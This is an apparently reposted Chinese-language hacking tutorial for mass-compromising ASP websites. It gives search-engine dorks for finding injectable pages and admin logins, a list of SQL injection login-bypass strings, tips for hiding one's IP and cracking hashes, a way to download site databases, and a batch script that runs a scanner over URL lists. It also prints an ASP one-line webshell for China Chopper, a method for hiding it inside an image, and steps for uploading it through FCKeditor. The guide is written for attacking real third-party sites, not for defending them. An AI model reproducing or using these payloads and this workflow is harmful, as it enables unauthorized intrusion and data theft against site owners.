利用搜索引擎批量搜索注入漏洞SQL注入(2)

来源:互联网 发布:淘宝佣金推广 接口 编辑:程序博客网 时间:2024/05/20 16:34

搜索引擎语言:

inurl:例如:inurl:admin.asp  把网址中出现admin。asp的都搜索出来或者inurl:.asp?

intext:在内容中找

intitle:在头顶中找

site:属于...的网页例如:site:baidu.com属于百度的网页

由于公司的asp网页较容易出现漏洞则搜索:

inurl:.asp?id=   intext:公司

一般的后台为:

admin.asp所以在搜索中可以搜索:inurl:admin.asp   inurl:adminlogin.asp

进入后台后不安全的后台的万能密码:

1:"or "a"="a
   2: ')or('a'='a
   3:or 1=1--
   4:'or 1=1--
   5:a'or' 1=1--
   6:"or 1=1--
   7:'or'a'='a
   8:"or"="a'='a
   9:'or''='
   10:'or'='or'
   11: 1 or '1'='1'=1
   12: 1 or '1'='1' or 1=1
   13: 'OR 1=1%00
   14: "or 1=1%00
   15: 'xor

.................(写在用户名上)

申请http代理来掩盖自己的ip地址:工具 Internet选项 链接 局域网设置 为LAN使用代理服务器

默认网站一般在c盘的intput下的wwwroot文件夹下

破解加密的网站:cmd5.cn


网站的后台一般为:/admin.asp

/admin/admin_login.asp



搜索:server.mappath(".mdb")

在搜索结果中找到mdb结尾的一串复制到网站后面就可以下载网站的数据库从而获得管理权限



下面是有关扫描起的使用:绿色而且返回时200为成功,灰色的都是失败例如wwwscan的使用

可以写个批处理文件(同时要创建一个url.text文件夹用来存放网址,这样一点批处理就会处理.txt中的网址)

@echo off

color 0a

rem MODE con cols=80 LINES=36

cls

for /f %% a in(url.text) do wwwscan.exe %%a -m 300 -t 30 -f 90

(具体的建议百度)



下面是一句话木马:

创建一个.asp结尾的文件,用记事本的方式打开:

<%excute request("***")%>

***为自由输入值也是中国菜刀后面要输入的密码值(这个语句是可以下载其他文件中来增加隐蔽性的)

制作图片木马:

在一个文件夹下放一张图,并且写一个一句话木马文件,之后写一个批处理文件:

copy 1.jpg/b+1.text/a diy.jpg


一个文件夹以.asp结尾那么这个文件夹中的文件都已.asp的方式解释

这个图片木马也要放在以.asp结尾的文件夹中


用扫描器扫描出的带有fckeditor的文件则存在fck编辑器漏洞

进入这些链接,创建好文件夹并上传图片木马,用菜刀去连接

0 0